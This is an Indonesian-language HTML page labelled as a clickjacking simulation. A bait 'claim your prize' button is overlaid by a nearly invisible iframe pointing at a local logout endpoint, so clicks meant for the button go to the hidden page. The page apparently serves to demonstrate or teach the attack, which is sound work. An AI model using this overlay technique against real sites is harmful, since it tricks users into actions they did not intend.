<!DOCTYPE html>
<html>
<head>
  <title>Simulasi Clickjacking</title>
  <style>
    body {
      margin: 0;
      padding: 0;
    }

    .bait {
      position: absolute;
      top: 100px;
      left: 100px;
      width: 200px;
      height: 50px;
      background-color: #4CAF50;
      color: white;
      font-size: 18px;
      border: none;
      cursor: pointer;
      z-index: 1;
    }

    iframe {
      position: absolute;
      top: 100px;
      left: 100px;
      width: 200px;
      height: 50px;
      opacity: 0.01; /* hampir tak terlihat */
      border: none;
      z-index: 2;
    }
  </style>
</head>
<body>
  <h1>🎁 Klaim Hadiah Sekarang!</h1>
  <p>Tekan tombol di bawah ini untuk mendapatkan hadiah eksklusif!</p>

  <!-- Tombol palsu -->
  <button class="bait">Klaim Hadiah</button>

  <!-- iframe transparan -->
  <iframe src="http://127.0.0.1:5000/logout"></iframe>
</body>
</html>
